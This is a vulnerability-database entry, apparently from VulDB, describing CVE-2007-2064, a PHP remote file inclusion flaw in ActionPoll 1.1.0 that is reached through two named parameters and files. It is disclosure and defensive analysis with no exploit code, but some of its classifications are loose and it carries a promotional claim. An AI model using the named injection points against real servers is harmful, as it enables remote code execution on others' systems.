CVE-2007-2064 in ActionPoll
Summary
by MITRE
Multiple PHP remote file inclusion vulnerabilities in Robert Ladstaetter ActionPoll 1.1.0, and possibly 1.1.1, allow remote attackers to execute arbitrary PHP code via a URL in (1) the CONFIG_POLLDB parameter to actionpoll.php or (2) the CONFIG_DB parameter to db/DataReaderWriter.php, different vectors than CVE-2001-1297.
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Analysis
by VulDB Data Team • 05/05/2025
The vulnerability identified as CVE-2007-2064 represents a critical remote file inclusion flaw affecting Robert Ladstaetter ActionPoll version 1.1.0 and potentially 1.1.1. This vulnerability falls under the category of insecure direct object references and remote code execution, specifically classified as CWE-88 and CWE-94 according to the Common Weakness Enumeration framework. The flaw resides in the application's handling of user-supplied input parameters that are directly incorporated into file inclusion operations without proper sanitization or validation.
The technical implementation of this vulnerability occurs through two distinct attack vectors within the application's codebase. The first vector involves the CONFIG_POLLDB parameter in the actionpoll.php file, while the second vector targets the CONFIG_DB parameter within the db/DataReaderWriter.php file. Both vectors demonstrate a classic remote file inclusion vulnerability where attacker-controlled URLs are passed directly to include or require functions within the PHP application. This allows malicious actors to inject and execute arbitrary PHP code on the target server, effectively granting them remote code execution capabilities.
The operational impact of this vulnerability extends beyond simple code execution, as it enables attackers to gain full control over the affected web server. The vulnerability's remote nature means that exploitation can occur from any location without requiring physical access to the system. Attackers can leverage this flaw to establish persistent backdoors, exfiltrate sensitive data, or use the compromised server as a launch point for further attacks within the network. The fact that this vulnerability operates through different vectors than CVE-2001-1297 demonstrates the persistent nature of such flaws in legacy applications and highlights the importance of proper input validation.
From an attack perspective, this vulnerability aligns with techniques described in the MITRE ATT&CK framework under the T1190 (Exploit Public-Facing Application) and T1059 (Command and Scripting Interpreter) tactics. The attack surface is particularly concerning as it affects web applications that may be deployed in production environments with limited security monitoring. The vulnerability's exploitation requires minimal technical skill and can be automated using existing penetration testing frameworks, making it attractive to both skilled and unskilled attackers. Organizations should implement immediate mitigations including input validation, parameter sanitization, and the removal of vulnerable code paths to prevent exploitation of this vulnerability.